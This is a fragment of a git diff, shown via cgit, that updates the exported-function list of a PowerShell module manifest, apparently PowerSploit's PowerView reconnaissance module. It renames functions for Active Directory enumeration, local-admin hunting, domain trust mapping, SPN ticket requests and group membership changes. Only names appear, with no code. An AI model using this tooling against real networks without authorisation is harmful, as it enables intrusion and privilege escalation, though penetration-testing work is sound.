- 'Get-NetGroup',
- 'Get-NetGroupMember',
+ 'Get-DomainGroup',
+ 'New-DomainGroup',
+ 'Get-DomainManagedSecurityGroup',
+ 'Get-DomainGroupMember',
+ 'Add-DomainGroupMember',
+ 'Get-DomainFileServer',
+ 'Get-DomainDFSShare',
+ 'Get-DomainGPO',
+ 'Get-DomainGPOLocalGroup',
+ 'Get-DomainGPOUserLocalGroupMapping',
+ 'Get-DomainGPOComputerLocalGroupMapping',
+ 'Get-DomainPolicy',
'Get-NetLocalGroup',
+ 'Get-NetLocalGroupMember',
+ 'Get-NetShare',
'Get-NetLoggedon',
- 'Get-NetOU',
- 'Get-NetProcess',
- 'Get-NetRDPSession',
'Get-NetSession',
- 'Get-NetShare',
- 'Get-NetSite',
- 'Get-NetSubnet',
- 'Get-NetUser',
- 'Get-ObjectAcl',
- 'Get-PathAcl',
- 'Get-Proxy',
- 'Get-RegistryMountedDrive',
- 'Get-SiteName',
- 'Get-UserEvent',
- 'Get-UserProperty',
- 'Invoke-ACLScanner',
- 'Invoke-CheckLocalAdminAccess',
- 'Invoke-DowngradeAccount',
- 'Invoke-EnumerateLocalAdmin',
- 'Invoke-EventHunter',
- 'Invoke-FileFinder',
- 'Invoke-MapDomainTrust',
+ 'Get-RegLoggedOn',
+ 'Get-NetRDPSession',
+ 'Test-AdminAccess',
+ 'Get-NetComputerSiteName',
+ 'Get-WMIRegProxy',
+ 'Get-WMIRegLastLoggedOn',
+ 'Get-WMIRegCachedRDPConnection',
+ 'Get-WMIRegMountedDrive',
+ 'Get-WMIProcess',
+ 'Find-InterestingFile',
+ 'Find-DomainUserLocation',
+ 'Find-DomainProcess',
+ 'Find-DomainUserEvent',
+ 'Find-DomainShare',
+ 'Find-InterestingDomainShareFile',
+ 'Find-LocalAdminAccess',
+ 'Find-DomainLocalGroupMember',
+ 'Get-DomainTrust',
+ 'Get-ForestTrust',
+ 'Get-DomainForeignUser',
+ 'Get-DomainForeignGroupMember',
+ 'Get-DomainTrustMapping',
+ 'Get-ComputerDetail',
+ 'Get-HttpStatus',
'Invoke-Portscan',
- 'Invoke-ProcessHunter',
- 'Invoke-ReverseDnsLookup',
- 'Invoke-ShareFinder',
- 'Invoke-UserHunter',
- 'New-GPOImmediateTask',
- 'Request-SPNTicket',
- 'Set-ADObject'
+ 'Invoke-ReverseDnsLookup'
)
# List of all files packaged with this module
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-25 22:23:29 +0000